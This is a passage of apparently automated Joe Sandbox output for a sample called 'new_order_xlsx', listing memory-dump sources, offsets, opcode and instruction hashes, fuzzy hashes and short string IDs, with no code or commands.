                        • Associated: 00000000.00000003.229599907.00000000034F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000003.229670582.00000000034F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_3_34f4000_new_order_xlsx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                        • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                        • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                        • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000003.231619192.0000000003508000.00000004.00001000.00020000.00000000.sdmp, Offset: 034F4000, based on PE: false
                        • Associated: 00000000.00000003.229599907.00000000034F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000003.229670582.00000000034F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_3_34f4000_new_order_xlsx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                        • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                        • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                        • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000003.229705657.000000000356C000.00000004.00001000.00020000.00000000.sdmp, Offset: 0356C000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_3_356c000_new_order_xlsx.jbxd
                        Similarity
                        • API ID:
                        • String ID: $0)@$7$<)@$D)@$L)@
                        • API String ID: 0-3088242726
                        • Opcode ID: 8e42451d48a56f7ccbea89492fea16576adab606abf73f6db0535c3d2d26f603
                        • Instruction ID: 5a0b1d47bfdbca4b6eb980f2134c0d6f4d4297ef37ec3c368bd454cb415e951e
                        • Opcode Fuzzy Hash: 8e42451d48a56f7ccbea89492fea16576adab606abf73f6db0535c3d2d26f603
                        • Instruction Fuzzy Hash: 1CA1D430B043988BDF21EA2CD884BA8B7F8FB49710F1441F5D58AEB3A1CB758985CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000003.230073314.00000000034F8000.00000004.00001000.00020000.00000000.sdmp, Offset: 034F4000, based on PE: false
                        • Associated: 00000000.00000003.229599907.00000000034F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000003.229670582.00000000034F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_3_34f4000_new_order_xlsx.jbxd
                        Similarity
                        • API ID:
                        • String ID: $0)@$7$<)@$D)@$L)@
                        • API String ID: 0-3088242726
                        • Opcode ID: 8e42451d48a56f7ccbea89492fea16576adab606abf73f6db0535c3d2d26f603
                        • Instruction ID: f44ecec8364323e2b5f0ef0be6fc73223dcd7693b03eeb9ba8ff93cd3039c793
                        • Opcode Fuzzy Hash: 8e42451d48a56f7ccbea89492fea16576adab606abf73f6db0535c3d2d26f603
                        • Instruction Fuzzy Hash: FEA1F434A043648FDB21EA2CC884B99B6E5EB49314F1C40F7E64D9F381CB758985CF59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000003.230000806.0000000003500000.00000004.00001000.00020000.00000000.sdmp, Offset: 034F4000, based on PE: false
                        • Associated: 00000000.00000003.229599907.00000000034F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000003.229670582.00000000034F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_3_34f4000_new_order_xlsx.jbxd
                        Similarity
                        • API ID:
                        • String ID: $0)@$7$<)@$D)@$L)@
                        • API String ID: 0-3088242726
                        • Opcode ID: 6b727b5e2eaa3024b19e37284d5a62da3022080e756bf3cbe8248c63325a4f04
                        • Instruction ID: decc607ae33ab13ebbbcffb96e0ac190e66cc41ae55e5b8adacb141c7f9ea20e
                        • Opcode Fuzzy Hash: 6b727b5e2eaa3024b19e37284d5a62da3022080e756bf3cbe8248c63325a4f04
                        • Instruction Fuzzy Hash: 66A10738B047548BDB21EA2CD884BD8BAF5FB49310F1445F5E449AB2D2CB768AC5CB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000003.231619192.0000000003508000.00000004.00001000.00020000.00000000.sdmp, Offset: 034F4000, based on PE: false
                        • Associated: 00000000.00000003.229599907.00000000034F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000003.229670582.00000000034F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_3_34f4000_new_order_xlsx.jbxd
                        Similarity
                        • API ID:
                        • String ID: $0)@$7$<)@$D)@$L)@
                        • API String ID: 0-3088242726
                        • Opcode ID: 35e11455a52804f7f0df1a03ee55033f7cc1d147094ed85ca9bb5376e4057bd6
                        • Instruction ID: b10fded62015f0bc65ec7b1b725c4fc144dde70e9d9d394e6e986e3058defeb6
                        • Opcode Fuzzy Hash: 35e11455a52804f7f0df1a03ee55033f7cc1d147094ed85ca9bb5376e4057bd6
                        • Instruction Fuzzy Hash: 6CA1D334A043598BDF21EA2CD8C4B98B6F4FB49710F1841F5E449AB3E2DB76C985CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000003.229705657.000000000356C000.00000004.00001000.00020000.00000000.sdmp, Offset: 0356C000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_3_356c000_new_order_xlsx.jbxd
                        Similarity
                        • API ID:
                        • String ID: $0)@$7$L)@
                        • API String ID: 0-3436765255
                        • Opcode ID: 279b70a9cd7f3022531bf45402512d7d9342d9062b0a034600670c007807e5d4
                        • Instruction ID: d978e14f8f03fdc36ac80f4a8ac7e9f4b753c1c768c6a75da9f8224202f25707
                        • Opcode Fuzzy Hash: 279b70a9cd7f3022531bf45402512d7d9342d9062b0a034600670c007807e5d4
                        • Instruction Fuzzy Hash: D571C234B043988BDF21EA2CD884BE8B7F4FB49700F1441E6D589EB292DBB58985CB55
                        Uniqueness

                        Uniqueness Score: -1.00%